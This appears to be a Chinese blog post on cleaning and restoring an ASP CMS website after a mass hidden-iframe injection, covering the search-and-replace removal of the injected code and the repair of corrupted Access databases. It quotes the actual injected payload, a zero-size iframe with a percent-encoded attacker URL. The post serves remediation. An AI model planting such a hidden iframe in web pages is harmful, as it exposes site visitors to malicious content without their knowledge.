网站使用的程序：CreateLive CMS v3（编写语言ASP）

数据库：access

前天发现网站打不开，一检查发现大部分asp页面都被 <iframe> </iframe> 注入恶意AD。 因为

数据库是使用 .ASP 为后缀，所以也没有幸免。造成网站瘫痪。

由于没有及时备份网站，现在只能尽力想办法恢复

先说下使用到的软件(都是绿色的)：
Adobe Dreamweaver CS3 中文绿色版
http://www.xdowns.com/soft/1/95/2007/Soft_37526.html

数据恢复工具 EasyRecovery Professional 6.10.07 绿色汉化精简版
http://www.xdowns.com/soft/6/99/2006/Soft_32313.html

CreateLive CMS v3原始代码一份

1、备份
在进行恢复之前先把中病毒的网站文件全部copy一份。

2、清除网站被注入的病毒代码
使用Dreamweaver随便打开几个被注入的网页，一般会在网站底部找到被注入的代码。把代码复制

下来。

<Iframe src="http://%69%70%6F%71%69%2E%39%39%39%39%2E%6C%61/" width="0" height="0"></iframe>

使用Dreamweaver的查找替换功能

查找范围：网站文件夹，
搜 索 ：源代码
查 找 ：把上面的注入代码复制下来，
点击右边的“替换全部”

这样就完成了网站被注入的病毒代码的批量清除。

3、数据库的修复
仔细检查刚才替换后的结果，发现有个四个asp文件是乱码，判断这些文件可能是数据库

因为被批量替换以后的数据库文件被破坏了所以打不开。
去前面copy的网站文件下找到这四个.asp文件，复制出来以后。把它的后缀名改为.mdb
使用EasyRecovery进行access数据库的修复

点击 下一步 就能自动修复数据库了。这里要注意的是原数据库和修复后的数据库不能存放在同一个目录。

4、数据库数据的检查与整理
找到CreateLive CMS v3原始数据库。打开刚刚修复的数据库(需要安装office access)
检查下两个数据库中的表是否一样多。

打开每个表，检查下里面的字段是不是一样。

如果一样直接把修复的数据库中的数据，直接复制到原始数据库的对应表中。
这样做的目的是:解决数据库恢复后一些字段的类型发生变化。
最明显的是“ID的自动编号字段”

如果发现字段不一样。可以直接把这个表导入到 原始数据库 中进行替换。
在该表打开的状态下进行导出，选择要导入的原始数据库即可。

上面的工作做完以后把，另外的三个数据库网站也检查一下。

5、恢复网站。
把修改好的四个数据库文件，修改为网站原来的名字。
替换到网站相应目录。就完成了网站的修复工作。